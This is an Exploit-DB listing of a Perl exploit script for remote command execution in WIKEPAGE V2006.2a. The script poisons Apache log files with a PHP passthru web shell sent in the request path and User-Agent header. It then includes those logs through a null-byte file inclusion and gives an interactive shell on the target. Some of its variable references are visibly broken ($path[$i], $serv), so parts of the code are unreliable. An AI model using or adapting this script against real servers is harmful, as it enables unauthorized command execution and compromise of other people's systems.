Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
#!/usr/bin/perl # # WIKEPAGE <= V2006.2a Opus 10 Remote Command Execution Exploit # ------------------------------------------------------------- # IHST: h4ckerz.com / hackerz.ir # AST : Aria-Security.Net # Kapda : kapda.ir # #### (c)oded & discovered By Hessam-x ( Hessamx -at- Hessamx.net) use IO::Socket; use LWP::Simple; print "-------------------------------------------------------------\n"; print "= WIKEPAGE <= V2006.2a Remote Command Execution Exploit =\n"; print "= By Hessam-x - www.Hessamx.net =\n"; print "-----------------------------------------------------------\n\n"; if (@ARGV < 2) { print "[*] Usage: hxxpl.pl [host] [path]\n\n"; exit(); } $server=$ARGV[0]; $path=$ARGV[1]; print " SERVER : $server \n"; print " Path : $path \n"; print "-------------------------------------------\n"; $pcode ="<?php ob_clean();echo _Hessamx_;passthru(\$_GET[cmd]);echo _xHessam_;die; ?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server", PeerPort=>"http(80)") || die "[-] Cannot not connect to host !\n"; print $socket "GET ".$path.$pcode." HTTP/1.1\r\n"; print $socket "User-Agent: ".$pcode."\r\n"; print $socket "Host: ".$server."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "[+] PHP code injection in log file finished. \n"; $log = "no"; @apache=( "/var/log/httpd/access_log","/var/log/httpd/error_log", "/var/log/apache/error.log","/var/log/apache/access.log", "/apache/logs/error.log", "/apache/logs/access.log", "/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log", "/etc/httpd/logs/error_log","/etc/httpd/logs/error.log", "/var/www/logs/access_log","/var/www/logs/access.log", "/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log", "/var/log/apache/access_log","/var/log/apache/access.log", "/var/log/access_log","/var/www/logs/error_log", "/www/logs/error.log","/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log","/var/log/apache/error_log", "/var/log/apache/error.log","/var/log/access_log","/var/log/error_log", ); for ($i=0; $i<=$#apache; $i++) { print "[+] Apache Path : ".$i."\n"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server, Timeout => 10, PeerPort=>"http(80)") || die "[-] cannot connect to host! \n"; print $sock "GET ".$path."index.php&cmd=id&lng=".$path[$i]."%00 HTTP/1.1\r\n"; print $sock "Host: ".$server."\r\n"; print $sock "Connection: close\r\n\r\n"; $out = ""; while ($answer = <$sock>) { $out.=$answer; } close($sock); if ($out =~ m/_Hessamx_(.*?)_xHessam_/ms) { print "[+] Log File found ! [ $i ] \n\n"; $log = $i; $i = $#path } } if ($log eq "no") { print "[-] Can not found log file ! \n"; print "\n[-] Exploit Failed ! ... \n"; exit; } print "[Hessam-x\@ $server] \$ "; $cmd = <STDIN>; while($cmd !~ "exit") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") || die "[-] Cannot connect to host !\n"; print $socket "GET ".$path."index.php?cmd=".$cmd."&lng=../../../../../../../../..".$path[$log]."%00 HTTP/1.1\r\n"; print $socket "Host: ".$serv."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($answer = <$socket>) { print $answer; } print "[Hessam-x\@ $server ] \$ "; $cmd = <STDIN>; } # milw0rm.com [2006-08-24]